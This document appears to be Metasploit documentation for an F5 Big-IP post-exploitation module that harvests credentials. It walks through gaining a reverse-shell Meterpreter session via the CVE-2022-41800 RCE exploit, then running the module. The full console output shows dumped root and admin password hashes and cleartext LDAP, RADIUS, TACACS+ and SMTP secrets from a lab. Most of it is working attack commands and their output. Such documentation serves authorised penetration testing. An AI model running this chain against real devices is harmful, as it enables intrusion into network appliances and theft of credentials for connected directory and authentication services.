Vulnerable Application
The application is F5 Big-IP, and I don't think the versions matters but I tested on version 17.0.0.1. It can be downloaded as a VMWare image for free (you have to create an account) from https://downloads.f5.com. You can register for a free 30-day trial if you like, but it's not required to test this.
Boot the VM and set an admin password by logging in with the default credentials (admin / admin). You'll need that password.
Verification Steps
Install the application
Start msfconsole
Do: Get any session somehow (exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800 works well on 17.0.0.1 and earlier, or just use msfvenom w/ a Linux payload)
Do: use post/linux/gather/f5_loot_mcp
Do set SESSION <sessionid>
Do: run
You should get the info
Options
GATHER_HASHES
If true, read a list of local users and passwords (userdb_entry values) from mcp.
Default: true
GATHER_SERVICE_PASSWORDS
If true, read upstream service passwords (active directory, LDAP, etc) from different parts of mcp.
Default: true
GATHER_DB_VARIABLES
If true, read configuration information from mcp (note that this is slow).
Default: false (due to the speed)
Scenarios
F5 Big-IP 17.0.0.1 with a root session
First, get a non-root session however you can. I used the rpmspec vuln:
msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword mybigtestpassword
HttpPassword => iagotestbigip
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
RHOST => 10.0.0.162
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
LHOST => 10.0.0.179
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Sending stage (40168 bytes) to 10.0.0.162
[+] Deleted /var/config/rest/node/tmp/708677fa-5b30-43e6-9ce3-d84046e9f6e9.spec
[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/yE15kZeAwp-1.6.1-7.4.4.noarch.rpm
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:36124) at 2022-11-14 16:12:04 -0800
meterpreter > bg
Then just use the module, set the SESSION, and run it:
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > use post/linux/gather/f5_loot_mcp
msf6 post(linux/gather/f5_loot_mcp) > set SESSION 1
SESSION => 1
msf6 post(linux/gather/f5_loot_mcp) > set VERBOSE true
VERBOSE => true
msf6 post(linux/gather/f5_loot_mcp) > show options
Module options (post/linux/gather/f5_loot_mcp):
Name Current Setting Required Description
---- --------------- -------- -----------
GATHER_DB_VARIABLES false yes Gather database variables (warning: slow)
GATHER_HASHES true yes Gather password hashes from mcp
GATHER_UPSTREAM_PASSWORDS true yes Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from mcp
SESSION 1 yes The session to run this module on
View the full module info with the info, or info -d command.
msf6 post(linux/gather/f5_loot_mcp) > run
[*] Gathering users and password hashes from MCP
[+] admin:$6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi2j0mh.ww9i1
[+] f5hubblelcdadmin:yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG
[+] root:$6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr0gocIIyMoc1
[*] Gathering upstream passwords from MCP
[*] Trying to fetch LDAP / Active Directory configuration
[+] dc.msflab.local:636 - ldaps: 'smcintyre:Password1!'
[*] Trying to fetch Radius configuration
[+] 192.168.159.12:1812 - radius: ':radiussecret'
[+] 192.168.159.13:1812 - radius: ':radiusbackup'
[*] Trying to fetch TACACS+ configuration
[+] 192.168.159.200:49 - tacacs+: ':tacaspassword'
[*] Trying to fetch SMTP configuration
[+] 192.168.159.128:25 - smtp: 'alice:secretpassword'
[*] Post module execution completed
The module logs information to the Metasploit database (when connected):
msf6 post(linux/gather/f5_loot_mcp) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.159.119 smcintyre Password1! Password
192.168.159.119 admin $6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi (TRUNCATED) Nonreplayable hash sha512,crypt
192.168.159.119 f5hubblelcdadmin yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG Nonreplayable hash
192.168.159.119 root $6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr (TRUNCATED) Nonreplayable hash sha512,crypt
192.168.159.12 192.168.159.119 1812/tcp (radius) radiussecret Password
192.168.159.13 192.168.159.119 1812/tcp (radius) radiusbackup Password
192.168.159.128 192.168.159.119 25/tcp (smtp) alice secretpassword Password
192.168.159.200 192.168.159.119 49/tcp (tacacs+) tacaspassword Password
msf6 post(linux/gather/f5_loot_mcp) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.159.12 1812 tcp radius open
192.168.159.13 1812 tcp radius open
192.168.159.128 25 tcp smtp open
192.168.159.200 49 tcp tacacs+ open
msf6 post(linux/gather/f5_loot_mcp) >
